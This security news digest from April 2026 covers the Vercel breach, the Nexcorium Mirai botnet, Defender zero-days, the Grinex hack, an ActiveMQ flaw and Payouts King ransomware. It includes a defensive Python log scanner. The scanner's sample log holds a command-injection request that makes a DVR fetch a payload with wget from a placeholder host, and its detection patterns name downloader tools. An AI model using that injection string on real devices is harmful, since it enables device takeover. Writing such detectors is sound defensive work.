Vercel discloses security breach: employee account compromised through an AI tool

Published 2026-04-20

1. Vercel discloses security breach: employee account compromised through an AI tool


April 19: Cloud development platform Vercel recently disclosed a security incident, stating that an unauthorized third party had gained access to some of its internal systems. The company said the incident affected a subset of customers, but that its main services, Next.js, Turbopack and its other open-source projects were not affected. Vercel has engaged incident response specialists to assist with the investigation and has notified law enforcement. According to a subsequent update, the breach originated with the compromise of the Google Workspace OAuth application of the third-party AI tool Context.ai, which led to the takeover of a Vercel employee's Google Workspace account. The attacker then used that account to escalate access within the Vercel environment and enumerated environment variables that had not been marked as "sensitive"; these variables are not encrypted at rest and are intended only for non-sensitive data, but through enumeration the attacker obtained further access. At the same time, a threat actor calling itself "ShinyHunters" posted on a hacking forum claiming to have breached Vercel and offering the stolen data for sale, including access keys, source code, database contents, internal deployments and API keys. The actor also shared a text file with 580 records of Vercel employee information (names, e-mail addresses, account status and so on) and a screenshot of what appears to be an internal panel. The attacker further claimed to have contacted Vercel with a ransom demand of about 2 million US dollars.


https://www.bleepingcomputer.com/news/security/vercel-confirms-breach-as-hackers-claim-to-be-selling-stolen-data/


2. Nexcorium botnet spreads through TBK DVR and legacy router vulnerabilities


April 18: Fortinet researchers found that threat actors are exploiting a command injection vulnerability in TBK DVR devices (CVE-2024-3721), along with flaws in other legacy IoT devices such as end-of-life TP-Link routers, to spread a new Mirai variant named Nexcorium. The attackers exploit CVE-2024-3721 by tampering with specific request parameters to deliver a downloader script. The associated network traffic carries a custom "X-Hacked-By" header with the value "Nexus Team", hinting at the attackers' identity, although little is known about the group. The script, named "dvr", downloads malware samples labelled "nexuscorp". Further analysis of the "nexuscorp.x86" sample showed that the malware, named Nexcorium, is a Mirai-family variant that prints a message when executed. It uses XOR decoding to extract an embedded configuration containing C2 server details, attack commands and a persistence script. Like other Mirai variants, Nexcorium sets up a monitor process, a scanner and several DDoS attack modules. It performs integrity checks and re-creates itself if tampering is detected. In addition, the malware embeds exploits for Huawei devices (such as CVE-2017-17215) and carries a large list of default credentials for brute-forcing Telnet access.
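As an added example (not code from the Fortinet or Security Affairs write-up), a small Python log-triage routine that flags the indicators described above in constructed web-server access log lines: the custom X-Hacked-By header, shell metacharacters plus a downloader in a query string, and requests for the "dvr" script or "nexuscorp" samples. The log format, paths and addresses in the sample are assumptions made for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not real captures): common log format with the
# User-Agent and the X-Hacked-By request header ("-" when absent) appended as
# two quoted fields. Paths and addresses are made up for this example.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Apr/2026:09:12:01 +0000] "GET /cgi-bin/status?lang=en HTTP/1.1" 200 512 "Mozilla/5.0" "-"
203.0.113.9 - - [18/Apr/2026:09:12:05 +0000] "GET /cgi-bin/status?lang=en;wget+http://198.51.100.5/dvr HTTP/1.1" 200 0 "Hello, world" "Nexus Team"
203.0.113.9 - - [18/Apr/2026:09:12:09 +0000] "GET /nexuscorp.x86 HTTP/1.1" 404 0 "Wget" "-"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<ua>[^"]*)" "(?P<hacked_by>[^"]*)"$'
)
# Shell metacharacters plus a downloader in the query string: the generic shape
# of a command-injection-to-loader request, not a product-specific signature.
INJECT_RE = re.compile(r'[;|`]|\$\(')
LOADER_RE = re.compile(r'\b(wget|curl|tftp)\b')
# Artefact names quoted in the report: the "dvr" script and "nexuscorp" samples.
PAYLOAD_RE = re.compile(r'(?:^|/)(dvr|nexuscorp(?:\.\w+)?)(?:$|[?&\s])')

def inspect_request(ip, target, hacked_by):
    # Returns (ip, decoded_target, reasons) for one request, or None if clean.
    decoded = unquote_plus(target)
    reasons = []
    if hacked_by and hacked_by != "-":
        reasons.append(f"X-Hacked-By header present: {hacked_by!r}")
    query = decoded.partition("?")[2]
    if INJECT_RE.search(query) and LOADER_RE.search(query):
        reasons.append("shell metacharacters and downloader in query string")
    if PAYLOAD_RE.search(decoded):
        reasons.append("known Nexcorium artefact name requested")
    return (ip, decoded, reasons) if reasons else None

def scan_log(text):
    # Parse every well-formed line and collect the suspicious ones in order.
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            f = inspect_request(m["ip"], m["target"], m["hacked_by"])
            if f:
                findings.append(f)
    return findings
```

Run against a real log only after adapting LOG_RE to the server's actual log format; the header field must be logged explicitly, since standard formats do not record custom request headers.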


https://securityaffairs.com/190974/malware/nexcorium-mirai-variant-exploits-tbk-dvr-flaw-to-launch-ddos-attacks.html


3. Three Microsoft Defender zero-days exploited: only BlueHammer patched


April 18: Attackers are actively exploiting three recently disclosed zero-day vulnerabilities in Microsoft Defender to gain elevated privileges on compromised systems. The three flaws, named BlueHammer, RedSun and UnDefend, were discovered by a researcher using the alias "Chaotic Eclipse". After publicly criticising Microsoft's handling of the disclosure, the researcher published not only the vulnerability details but also proof-of-concept code for the unpatched Windows flaws. BlueHammer and RedSun allow an attacker to achieve local privilege escalation through Microsoft Defender, while UnDefend triggers a denial of service that blocks security definition updates, weakening the system's overall protection. So far Microsoft has patched only BlueHammer, assigning it CVE-2026-33825; RedSun and UnDefend remain unpatched. According to Huntress researchers, all three flaws have been used in real attacks, although the identities of the victims and attackers are unclear. Huntress reports that attackers began exploiting BlueHammer on April 10, 2026, and then on April 16 used RedSun and UnDefend in proof-of-concept attacks. The researchers believe the attackers are most likely using the exploit code that Chaotic Eclipse published online.


https://securityaffairs.com/190961/hacking/microsoft-defender-under-attack-as-three-zero-days-two-of-them-still-unpatched-enable-elevated-access.html


4. Grinex exchange halts operations after $13.7 million hack


April 17: Grinex, a cryptocurrency exchange headquartered in Kyrgyzstan, has suspended operations after a hack involving 13.7 million US dollars. The platform mainly serves Russian users, allowing Russian businesses and individuals to exchange cryptocurrency for roubles. The stolen funds came directly from Russian users' cryptocurrency wallets. In a statement, Grinex said the type of attack and its digital footprint indicate that the threat actors are linked to "foreign intelligence agencies" that possess "unprecedented resources and techniques available only to entities of specific states". The exchange claimed that, based on preliminary data, this was a coordinated attack aimed directly at undermining Russia's financial sovereignty. However, neither Grinex's statement nor the reports from blockchain analytics firms Elliptic and TRM Labs provided any concrete technical evidence or indicators to support attributing the attack to Western intelligence agencies. Elliptic disclosed that the theft occurred on Wednesday at 12:00 UTC, and that the stolen funds were sent to TRON and Ethereum addresses and then swapped into TRX and ETH through the SunSwap decentralised exchange protocol.


https://www.bleepingcomputer.com/news/security/grinex-exchange-blames-western-intelligence-for-137m-crypto-hack/


5. High-severity Apache ActiveMQ vulnerability actively exploited


April 17: The US Cybersecurity and Infrastructure Security Agency (CISA) warned on Thursday that a high-severity Apache ActiveMQ vulnerability patched earlier this month is now being actively exploited in the wild. The flaw, tracked as CVE-2026-34197, went undetected for 13 years and was finally found by Horizon3 researcher Naveen Sunkavally with the help of the Claude AI assistant. Apache ActiveMQ is the most popular Java-based open-source message broker and is widely used for asynchronous communication between applications. According to Sunkavally, the vulnerability stems from improper input validation, allowing an authenticated attacker to execute arbitrary code through an injection attack. Apache maintainers fixed the issue on March 30 in ActiveMQ Classic 6.2.3 and 5.19.4. The threat monitoring service ShadowServer is currently tracking more than 7,500 Apache ActiveMQ servers exposed on the internet. CISA has added CVE-2026-34197 to its Known Exploited Vulnerabilities (KEV) catalog and ordered Federal Civilian Executive Branch (FCEB) agencies to patch their ActiveMQ servers within two weeks, by April 30.


https://www.bleepingcomputer.com/news/security/cisa-flags-apache-activemq-flaw-as-actively-exploited-in-attacks/


6. Payouts King uses the QEMU emulator to run hidden virtual machines


April 17: The Payouts King ransomware is using the open-source QEMU emulator as a reverse SSH backdoor, running hidden virtual machines on compromised systems to evade endpoint security. According to researchers at security firm Sophos, they have observed two campaigns in which the attackers deployed QEMU. According to a Zscaler report, Payouts King may be linked to former BlackBasta affiliates, since it uses similar initial access steps. The ransomware employs heavy obfuscation and anti-analysis mechanisms, establishes persistence through scheduled tasks, and uses low-level system calls to terminate security tools. Its encryption scheme combines AES-256 (CTR) with RSA-4096 and uses intermittent encryption for large files. The second campaign documented by Sophos has been active since February and uses the CitrixBleed 2 vulnerability (CVE-2025-5777) for initial access. After compromising a NetScaler appliance, the attackers deploy a malicious ZIP archive, install a service named "AppMgmt", create a local administrator user, and install a ScreenConnect client for persistence; they then unpack and extract a QEMU package and run a hidden Alpine Linux VM. Inside the VM, the attackers manually install and compile tools such as Impacket, BloodHound.py and Metasploit for credential collection, Active Directory reconnaissance and data exfiltration.


https://www.bleepingcomputer.com/news/security/payouts-king-ransomware-uses-qemu-vms-to-bypass-endpoint-security/